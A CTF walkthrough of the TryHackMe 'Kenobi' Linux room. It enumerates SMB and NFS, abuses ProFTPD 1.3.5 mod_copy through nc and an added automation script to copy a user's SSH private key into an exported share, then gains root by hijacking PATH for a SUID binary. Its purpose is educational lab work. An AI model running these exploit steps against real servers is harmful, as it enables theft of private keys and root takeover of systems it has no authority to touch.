THM: Kenobi

kenken17
6 min readJan 28, 2021


Kenobi is a beginner room on Linux exploitation. Let’s deploy it and crack it!

After deploying, I again set an environment variable TARGET for the target box so I don’t have to keep the IP in my head.

$ export TARGET=10.10.73.220

Deploy the vulnerable machine

#Make sure you’re connected to our network and deploy the machine

answer: No answer needed

#Scan the machine with nmap, how many ports are open?

answer: 7

Kick off the room with an nmap service scan (-sV for version detection, -sC for the default scripts):

$ nmap -sV -sC $TARGET

7 open ports

Enumerating Samba for shares

#Using the nmap command above, how many shares have been found?

answer: 3

The information given in the section told us to run:

$ nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse $TARGET

Found 3 shares

#Once you’re connected, list the files on the share. What is the file can you see?

answer: log.txt

Once we know there is a share called anonymous, we can connect to it with smbclient and just press Enter at the password prompt, since it accepts an anonymous login:

smbclient //$TARGET/anonymous

Got the text file

We can then download all the files to our machine, again without a password, using smbget:

smbget -R smb://$TARGET/anonymous

log.txt

#What port is FTP running on?

answer: 21

From the nmap result above, we know FTP port is 21.

#What mount can we see?

answer: /var

The section shows how to get the mount information: rpcbind listens on port 111, and nmap’s NFS scripts query it for the exported directories:

$ nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount $TARGET

Gain initial access with ProFtpd

#What is the version?

answer: 1.3.5

From the nmap result above, the ProFTPD version is 1.3.5.

#How many exploits are there for the ProFTPd running?

answer: 3

Using searchsploit, we can see that version 1.3.5 has 3 exploits listed, all targeting its mod_copy module:

$ searchsploit 1.3.5 ftpd

#We know that the FTP service is running as the Kenobi user (from the file on the share) and an ssh key is generated for that user.

answer: No answer needed

From the log.txt file we downloaded, we can see that an SSH key pair was generated for the user kenobi (the ssh-keygen output is in the log) and that ProFTPD is configured to run as that same user.

username kenobi

#We knew that the /var directory was a mount we could see (task 2, question 4). So we’ve now moved Kenobi’s private key to the /var/tmp directory.

answer: No answer needed

#What is Kenobi’s user flag (/home/kenobi/user.txt)?

answer: [NO SPOILER]

To get the user flag over SSH, there are a few steps to take:

  1. connect to the FTP service with netcat (nc) and use it to copy the key
  2. copy id_rsa into a directory inside the NFS export, i.e. /var/tmp
  3. mount the export locally, grab the key & win

$ nc $TARGET 21

nc and copy the id_rsa to /var/tmp
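The copy step the screenshot above captures, as an added example that is not part of the original writeup: ProFTPD 1.3.5’s mod_copy module accepts SITE CPFR (copy from) and SITE CPTO (copy to) from a client that never logged in (this is the flaw behind the searchsploit hits, CVE-2015-3306), and the copy runs with the privileges of the ProFTPD process, i.e. kenobi, which is why /home/kenobi/.ssh/id_rsa is readable and /var/tmp is writable. The script below sends the same exchange you would type into nc by hand and checks the reply codes. The helper names, the run argument and the constructed transcripts are my own; the source and destination paths are the ones this room uses.

```sh
#!/bin/sh
# Added example (not the writeup's own code): copy kenobi's private key into
# the NFS-exported /var via ProFTPD 1.3.5's mod_copy module. mod_copy adds
# SITE CPFR (copy from) and SITE CPTO (copy to) and, in this version, does
# not require the client to log in first. The copy happens with the
# privileges of the ProFTPD process, i.e. the kenobi user, so only files
# kenobi can read and directories kenobi can write to are reachable.
# Helper names and the "run" argument are my own; the paths are the room's.

SRC_KEY=/home/kenobi/.ssh/id_rsa   # readable by the kenobi user
DST_KEY=/var/tmp/id_rsa            # /var is the export we saw with nmap

# Emit the command sequence exactly as you would type it into nc.
# FTP commands are terminated with CRLF.
mod_copy_commands() {
    printf 'SITE CPFR %s\r\nSITE CPTO %s\r\nQUIT\r\n' "$1" "$2"
}

# Check a server transcript: CPFR is acknowledged with a 350 reply and
# CPTO with a 250 reply. Anything else (e.g. 550 on a missing or
# unreadable file) means the copy did not happen.
mod_copy_verify() {
    printf '%s\n' "$1" | grep -q '^350 ' || return 1
    printf '%s\n' "$1" | grep -q '^250 ' || return 1
}

# Drive the real target: pipe the commands into nc and keep the replies.
mod_copy_run() {
    host=$1; src=$2; dst=$3
    replies=$(mod_copy_commands "$src" "$dst" | nc -w 5 "$host" 21)
    printf '%s\n' "$replies"
    mod_copy_verify "$replies"
}

# Usage: TARGET=10.10.x.x sh modcopy.sh run
if [ "${1:-}" = run ] && [ -n "${TARGET:-}" ]; then
    if mod_copy_run "$TARGET" "$SRC_KEY" "$DST_KEY"; then
        echo "key copied to $DST_KEY; now mount $TARGET:/var and fetch tmp/id_rsa"
    else
        echo "copy failed, see replies above" >&2
        exit 1
    fi
fi
```

Two things worth knowing before you rely on it: the copy is only as privileged as the FTP daemon, so the trick works here precisely because the service runs as kenobi rather than as a throwaway ftp user; and a 550 on CPFR usually means the path is wrong or unreadable, not that the module is absent.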

$ sudo mkdir /mnt/kenobiNFS

$ sudo mount $TARGET:/var /mnt/kenobiNFS

bad option?

If you hit an error like the one above, install the nfs-common package, which includes the /sbin/mount.nfs helper that mount needs for NFS filesystems, and re-run the command.

Then you can navigate to /mnt/kenobiNFS/tmp for id_rsa (the /var export is mounted at /mnt/kenobiNFS, so /var/tmp on the target shows up as /mnt/kenobiNFS/tmp).

Copy it to our local folder, then chmod the id_rsa to 600: ssh refuses to use a private key that other users can read.

$ cp /mnt/kenobiNFS/tmp/id_rsa ~/room/kenobi

$ cd ~/room/kenobi

$ chmod 600 id_rsa

$ ssh -i id_rsa kenobi@$TARGET

We got the flag!

Privilege Escalation with Path Variable Manipulation

#What file looks particularly out of the ordinary?

answer: /usr/bin/menu

Follow the information in the section and run find to look for SUID files on the system (-perm -u=s matches files with the setuid bit; errors from unreadable directories go to /dev/null):

$ find / -perm -u=s -type f 2>/dev/null

what is /usr/bin/menu ?

#Run the binary, how many options appear?

answer: 3

What is this menu file? Just run and check it out:

$ /usr/bin/menu

3 options

#We copied the /bin/sh shell, called it curl, gave it the correct permissions and then put its location in our path. This meant that when the /usr/bin/menu binary was run, its using our path variable to find the “curl” binary.. Which is actually a version of /usr/sh, as well as this file being run as root it runs our shell as root!

answer: [NO SPOILER]

Let’s try out what it does for each option:

Option 1:

HTTP/1.1 200 OK
Date: Thu, 28 Jan 2021 15:53:24 GMT
Server: Apache/2.4.18 (Ubuntu)
Last-Modified: Wed, 04 Sep 2019 09:07:20 GMT
ETag: "c8-591b6884b6ed2"
Accept-Ranges: bytes
Content-Length: 200
Vary: Accept-Encoding
Content-Type: text/html

Option 2:

4.8.0-58-generic

Option 3:

eth0 Link encap:Ethernet HWaddr 02:d9:45:27:ca:35
inet addr:10.10.73.220 Bcast:10.10.255.255 Mask:255.255.0.0
inet6 addr: fe80::d9:45ff:fe27:ca35/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:9001 Metric:1
RX packets:7323 errors:0 dropped:0 overruns:0 frame:0
TX packets:6695 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:585993 (585.9 KB) TX bytes:697831 (697.8 KB)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:246 errors:0 dropped:0 overruns:0 frame:0
TX packets:246 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:18383 (18.3 KB) TX bytes:18383 (18.3 KB)

From the three outputs above, we can guess that this menu program is running curl, uname and ifconfig. So we run strings on it to check how it calls those commands.

$ strings /usr/bin/menu

It runs curl, uname and ifconfig by bare name instead of by full path (/usr/bin/curl, /bin/uname, /sbin/ifconfig). The binary is SUID root, so each command it spawns runs with root privileges, and because a bare name is resolved through PATH, we can manipulate our PATH to make it run a program of our choosing as root.

Let’s put the /tmp folder at the front of our PATH:

$ export PATH=/tmp:$PATH

Since /tmp now comes first, the shell looks there before anywhere else for any command given without a full path.

Now we can fake the uname command and make it executable:

$ cat /etc/shells

Check what shell I can use.

$ echo /bin/sh > /tmp/uname

Fake the uname program. The file only contains the text /bin/sh and has no shebang, so when the kernel refuses to execute it, the shell that the menu binary uses to launch uname falls back to reading it as a script and runs /bin/sh. One caveat: /bin/sh (dash on Ubuntu) keeps the effective UID of root, whereas /bin/bash drops it unless started with -p, so stick with /bin/sh here.

$ chmod +x /tmp/uname

Make it executable.

$ /usr/bin/menu

Run the menu program, choose option 2 (the one that calls uname) and we get root!
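To see exactly why the hijack works, here is an added example that is not from the original writeup and needs no root or SUID binary: it builds two stand-ins for /usr/bin/menu in a temporary directory, one calling uname by bare name like the real binary and one calling it by absolute path, plus a fake uname in an attacker-controlled directory, and runs both with that directory prepended to PATH. The stand-ins, the HIJACKED marker and the helper names are my own; on the box the fake binary is /tmp/uname and its payload is /bin/sh.

```sh
#!/bin/sh
# Added example (not the writeup's own code): reproduce the PATH lookup
# behaviour that /usr/bin/menu relies on, without root or any SUID binary.
# menu_vuln stands in for the binary calling "uname -r" by bare name;
# menu_fixed is the same program calling uname by absolute path.
# The stand-ins, the HIJACKED marker and the helper names are my own.

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# Real uname, resolved before we touch PATH.
REAL_UNAME=$(command -v uname)

# Two stand-ins for the menu binary, one vulnerable and one hardened.
printf '#!/bin/sh\nuname -r\n' > "$WORK/menu_vuln"
printf '#!/bin/sh\n%s -r\n' "$REAL_UNAME" > "$WORK/menu_fixed"
chmod +x "$WORK/menu_vuln" "$WORK/menu_fixed"

# Attacker-controlled directory holding a fake uname, like /tmp/uname on the box.
HIJACK="$WORK/hijack"
mkdir "$HIJACK"
printf '#!/bin/sh\necho HIJACKED\n' > "$HIJACK/uname"
chmod +x "$HIJACK/uname"

# Run one of the stand-ins with the hijack directory in front of PATH
# (the equivalent of export PATH=/tmp:$PATH) and print what it outputs.
run_with_hijacked_path() {
    PATH="$HIJACK:$PATH" "$WORK/$1"
}

# Show which file a bare "uname" resolves to under the hijacked PATH.
resolve_uname() {
    ( PATH="$HIJACK:$PATH"; hash -r; command -v uname )
}

# Demo when run directly.
echo "vulnerable : $(run_with_hijacked_path menu_vuln)"   # HIJACKED
echo "hardened   : $(run_with_hijacked_path menu_fixed)"
echo "uname is   : $(resolve_uname)"
```

Only the stand-in that relies on PATH lookup is fooled, which also points at the fix for the real binary: call /bin/uname by absolute path, or set PATH to a fixed safe value before spawning anything, and do not ship a helper SUID root when it only reads public information. The example reproduces the lookup behaviour only; on the box the payload runs as root because the menu binary is SUID root and the shell it spawns inherits that effective UID.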
